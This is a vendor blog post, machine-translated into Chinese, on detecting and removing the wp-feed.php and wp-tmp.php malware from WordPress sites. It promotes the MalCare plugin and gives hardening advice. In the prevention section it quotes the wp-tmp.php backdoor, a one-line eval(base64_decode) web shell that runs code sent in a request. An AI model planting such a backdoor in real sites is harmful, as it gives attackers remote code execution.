• 主页
  • 文章
  • 指导
  • 修复 WordPress 中的 Wp-Feed.php 和 Wp-Tmp.php 恶意软件 - MalCare

修复 WordPress 中的 Wp-Feed.php 和 Wp-Tmp.php 恶意软件 - MalCare

已发表: 2023-04-19

您的恶意软件扫描程序是否警告您“您的网站被黑了”,但您认为它看起来还不错?

访问者是否抱怨您的 WordPress 网站上有垃圾邮件广告,但您没有看到任何广告?

您的网站很可能被黑客入侵。

黑客们找到了巧妙的方法来向网站所有者掩饰他们的黑客行为,这样他们就不会被发现,并且他们可以在很长一段时间内继续利用该网站。

wp-feed.php 是目前伪装得最巧妙的 hack 之一。

它向网站所有者隐藏,向您的访问者显示非法产品、毒品和成人内容的广告。

即使您能够检测到它,找到感染已经传播到的所有地方不仅困难而且有时是不可能的。 去除感染既复杂又困难。 如果您设法将其移除,在 10 例中有 8 例会再次出现感染。

底线:很难从 WordPress 网站中删除 wp-feed.php 感染。

幸运的是,我们之前已经无数次处理过这种恶意软件。 在过去十年中,我们不仅成功地从成百上千个 WordPress 网站中删除了 wp-feed,而且还防止了再次感染。

不用担心。 你得到了很好的照顾。

在本文中,您将了解到:

  • wp-feed.php 恶意软件如何运作以及它如何影响您的网站
  • 如何将其从您的网站中删除
  • 以后如何预防再次感染

TL;DR要删除 wp-feed.php 感染,您只需安装我们的WordPress 恶意软件删除并运行自动清除功能即可。 该插件还通过删除网站后门来帮助防止重新感染,这些后门可以重新感染并阻止恶意流量使用防火墙和登录保护访问您的网站。

什么是 wp-feed.php 和 wp-tmp.php? (原因、症状和再感染)

简而言之: WP-Feed 是一种在网站上显示恶意广告的恶意软件。 目标是让您的访问者点击广告并将他们重定向到恶意网站。

你一定想知道——

> 我的网站是如何被感染的?

感染通常是由于使用无效的插件或主题引起的。

无效软件很有吸引力,因为它们免费为您提供高级功能。 许多人认为分发无效软件是出于善意。

通常情况远非如此。 分发无效软件,以便黑客可以毫不费力地访问您的站点。

无效的插件或主题充斥着恶意软件。 当您在您的网站上安装一个无效的主题或插件时,您基本上是在为黑客打开访问您网站的大门。

除了无效的软件,过时的插件和主题也容易受到攻击。 黑客利用这些漏洞闯入您的网站。

他们还利用弱用户名和密码,如“admin”和“p@ssword”。 凭据薄弱很容易猜到。

黑客可以猜测您的用户名和登录名,并将 wp-feed.php 恶意软件直接植入您的网站。

> 为什么黑客会用 wp-feed.php 感染网站?

目的是窃取您的访问者并欺骗他们购买虚假服务或产品,以便黑客可以创收。

真正令人惊奇的是,他们通常能够在网站所有者没有得到任何提示的情况下实现这一目标。

这让我们想到了这个问题——

> 为什么很难注意到这种感染的症状?

一旦黑客获得了对您网站的访问权限,他们就会将两个文件(wp-feed.php 和 wp-tmp.php)植入您的 wp-includes 文件夹中。

wp-includes 文件夹是 WordPress 核心的一部分。 这是您网站主题所在的位置。

WP 提要文件开始感染其他 WordPress 文件,尤其是 function.php,它是您活动主题的一部分。

function.php文件zilla

从 function.php 中,黑客能够在您的 WordPress 网站上显示恶意弹出广告。

真正邪恶的部分是广告只显示给新访客,而不是回头客。 该恶意软件会记录您网站的访问者,以确保只有新访问者才能看到广告。 这是一种防止被发现的巧妙方法。

wp-feed 恶意软件

因此,作为您自己网站的常客,您永远不会注意到任何黑客入侵的迹象。

如何清除 wp-feed.php 恶意软件?

有两种方法可以消除感染。 那些是 -

1.使用插件(简单)

2. 手动完成(困难)

让我们深入了解每种方法。

1. 使用插件删除 WP-Feed.php 恶意软件(简单方法)

你们中的一些人可能已经在您的网站上安装了安全插件。 可能是这个插件提醒您有关恶意文件的信息——wp-includes/wp-feed.php 和 wp-includes/wp-tmp.php

大多数安全插件都提供恶意软件清除服务,但很少有插件能像 MalCare Security 那样快速有效地完成这项工作。

  • MalCare 将在60 秒内清理您的网站。 你不必举票。 您不必排队等候。 您不必将您网站的凭据交给第三方插件。
  • 不仅如此,该插件还超越了每个角落,寻找隐藏的恶意软件。 它会发现您网站上存在的每一个恶意脚本
  • 它使用非传统方法检测新的和隐藏良好的恶意软件。 它彻底分析代码的行为以识别恶意意图。 这也有助于确保它不会将好代码标记​​为坏代码
  • 它会在几分钟内完成所有这些工作。

让我们用 MalCare 清除 wp-feed.php 感染。

第 1 步:在您的 WordPress 网站上安装并激活 MalCare Security。

第 2 步:从仪表板菜单中选择 MalCare。 输入您的电子邮件地址,然后单击Secure Site Now

现在是 malcare 安全站点

第 3 步:在下一页上,系统会要求您输入密码,然后输入您的 URL

MalCare 将立即开始扫描您的网站。 目的是找到您网站上存在的每一个恶意代码实例。

这意味着,它不仅会检测 wp-feed.php 和 wp-tmp.php 文件,还会检测所有感染 WordPress 文件的恶意代码,包括隐藏在 function.php 文件中的实例。

您可以放心,该插件还会找到您网站上存在的每个后门,以防止再次感染。

添加站点

发现恶意脚本后,插件会提醒您。

接下来,您需要清理您的网站。

医疗保健安全

请注意,MalCare 的恶意软件清除是一项高级功能。 它是目前唯一的即时恶意软件删除插件。 只需每年 99 美元,您就可以根据需要多次清理单个站点,并确保获得可能拥有的最佳保护。 详细了解MalCare 定价

第 4 步:要从您的网站中删除 wp-feed.php 的所有痕迹,您需要做的就是单击“自动清除”按钮。

MalCare 将立即开始清理您的网站。

malcare 自动清洁

就是这样,伙计们。 这就是您使用插件清理网站的方式。

2. 手动删除 WP-Feed.php 恶意软件(困难的方法)

手动清除感染是相当具有挑战性的,因为在这种类型的感染中,有很多移动的部分。

  • 黑客上传了两个恶意文件——wp-feed.php 和 wp-tmp.php。 您需要删除它们才能开始。 这可能是唯一容易的一点。
  • 感染传播到其他 WordPress 文件,包括 function.php 文件。 这很难,因为谁能说清楚感染在哪里传播。
    • 找到所有恶意代码需要几个小时。
    • 识别恶意代码很困难,因为它们伪装得很好并且看起来像正常的代码片段。
    • 一些已知的恶意代码,如“eval(base64_decode)”,可能是合法插件的一部分。 它们不会以恶意方式使用。 因此,删除代码会影响您的插件,甚至可能破坏您的网站。
    • 您很有可能会错过可能导致再次感染的代码片段。

因此,手动删除根本无效。

但是,如果您仍想这样做,请对您的网站进行完整备份。 如果您最终不小心删除了某些内容并破坏了您的网站,您可以快速将其恢复正常。

这是您可以选择的最佳备份服务列表。

这里有一篇文章可以帮助您手动删除恶意软件 – WordPress hacked。 只需跳转到“如何手动清理被黑的 WordPress 网站”部分。

您的网站现在没有感染,但还远谈不上安全。 黑客仍然可以瞄准您的网站并尝试感染它。 您需要确保您的网站免受未来感染。 但在开始之前,让我们先看看 wp-feed.php 和 wp-tmp.php 感染的影响。

wp-temp.php 恶意软件感染的影响

不用说,wp-feed.php 和 wp-tmp.php 恶意软件的存在会对您的网站造成毁灭性的影响。

感染wp-temp.php的网站往往会出现以下后果:

  • 您会注意到跳出率的跳跃访问者在您网站上花费的时间的减少
  • 弹出式广告会使您的网站变得沉重而且非常缓慢
  • 没有人喜欢速度慢的网站,因此访问者很可能会在您的页面加载到浏览器之前点击后退按钮。 这将产生多米诺骨牌效应。
  • 搜索引擎会注意到人们离开您网站的速度有多快。 他们会得出结论,您没有提供用户正在搜索的内容。 你的搜索引擎排名会下降
  • 这意味着您可能花费在 SERP 中排名更高的所有努力、时间和金钱都浪费了

谷歌黑名单

  • 被黑网站被谷歌列入黑名单并被托管服务提供商暂停。 此外,如果被黑网站正在运行谷歌广告,则 Adwords 帐户将被暂停。 所有这些都将导致流量进一步下降。
  • 此外,如果您没有使用正确的工具,则必须清理被黑网站,这可能是一件代价高昂的事情

好消息是您知道您的网站被黑了。 因此,您可以清洁它并停止影响。

将来如何保护您的站点免受 wp-feed.php 恶意软件的侵害?

我们的许多读者可能已经尝试从他们的站点中删除 wp-feed.php 恶意软件,却发现该恶意软件不断返回。

发生这种情况是因为您的站点上安装了后门。 大多数后门程序伪装得非常好,以至于业余开发人员可以将它们作为合法代码传递。

在上一节中,我们解释说黑客会在您的网站代码中插入两个文件 wp-feed.php 和 wp-tmp.php。 wp-tmp.php 文件充当后门。 如果你打开文件,你会发现一个看起来像这样的脚本 -

 $p = $REQUEST$#91;"m"]; eval(base64_decode ($p));

好消息是,您可以通过采取以下措施来保护您的网站免受未来的黑客攻击 –

1.删​​除无效软件并停止使用它们

如果您在网站上使用无效的插件或主题,请立即将其删除

黑客首先使用无效软件访问您的站点。 无论您如何清理网站,如果您不删除无效软件,黑客就会找到进入您网站并植入恶意软件的途径。

如果您已授予用户安装插件和主题的权限,请确保他们从不使用无效软件。

事实上,最好练习在 MalCare 的帮助下完全阻止插件和主题的安装

您需要做的就是登录 MalCare 的仪表板,选择您的网站,单击Apply Hardening ,然后启用Block Plugin/Theme Installation。

阻止插件或主题安装

2.加强您的网站安全

您可以通过更改文件权限来防止黑客将 wp-feed.php 等恶意文件植入您的 WordPress 文件夹中。

文件权限是一组规则,用于确定谁可以访问哪些文件。 您可以阻止用户修改 wp-includes 文件夹。 要更深入地了解文件权限,请查看本指南:WordPress 文件权限。

更改权限文件管理器

您还可以通过禁用文件编辑器来阻止黑客修改您的主题。 这将防止他们在您的网站上插入弹出式广告。 您可以手动执行此操作,但有风险且不推荐。

如果您的网站上已经安装了 MalCare,您需要做的就是单击一个按钮来禁用文件编辑器。

禁用文件编辑器

了解有关 WordPress 强化的更多信息。

3. 保持网站更新

就像任何其他软件一样,WordPress 插件和主题也会产生漏洞。 当开发人员得知此漏洞时,他们会迅速创建补丁并以更新的形式发布。

如果实施更新有任何延迟,就会使您的网站面临风险。

黑客善于利用漏洞。 事实上,他们一直在寻找有漏洞的网站,以便他们可以利用它来访问该网站并用恶意软件感染该网站。

因此,永远不要延迟更新。

您可以从此处了解有关安全更新的更多信息 – WordPress 安全更新。

这里有一份指南可以帮助您保持网站更新 – 如何更新 WordPress。

4.强制使用强凭证

访问您网站的最简单方法是通过您的登录页面。

黑客只需要成功猜出您的用户凭据即可。 事实上,他们设计的机器人可以在几分钟内尝试数百种用户名和密码组合。 如果您或您的任何队友使用“admin”和“password123”等易于猜测的凭据,机器人将在 2 秒内攻破您的站点。 这称为蛮力攻击。

确保您网站的每个用户都使用唯一的用户名和强密码非常重要。

您甚至可以超越此范围并实施多种措施来保护您的登录页面。 我们编制了一份您可以采取的 WordPress 登录安全措施列表。

5.使用防火墙

如果您能够从一开始就阻止黑客登陆您的网站,那不是很好吗?

防火墙正是您需要的工具。

会调查想要访问您网站的流量。 如果检测到流量来自恶意 IP 地址,防火墙会立即阻止流量。

通过这种方式,它可以过滤掉黑客和机器人。

这是您可以在您的站点上激活的最佳 WordPress 防火墙列表。

但是,如果您使用的是 MalCare,那么您的站点上已经激活了防火墙。

恶意防火墙

接下来是什么?

我们已经向您展示了如何清理您的网站以及如何确保您再也不会被黑客入侵。

我们认为可以使您的网站免于许多灾难的一条建议是 – 定期备份您的网站。

无论您的网站是突然出现错误还是损坏,备份都可以帮助您快速临时修复您的网站。

如果您订阅了 MalCare Security,您还可以额外付费使用备份插件。 与我们联系以了解更多信息。

试一试MalCare 安全插件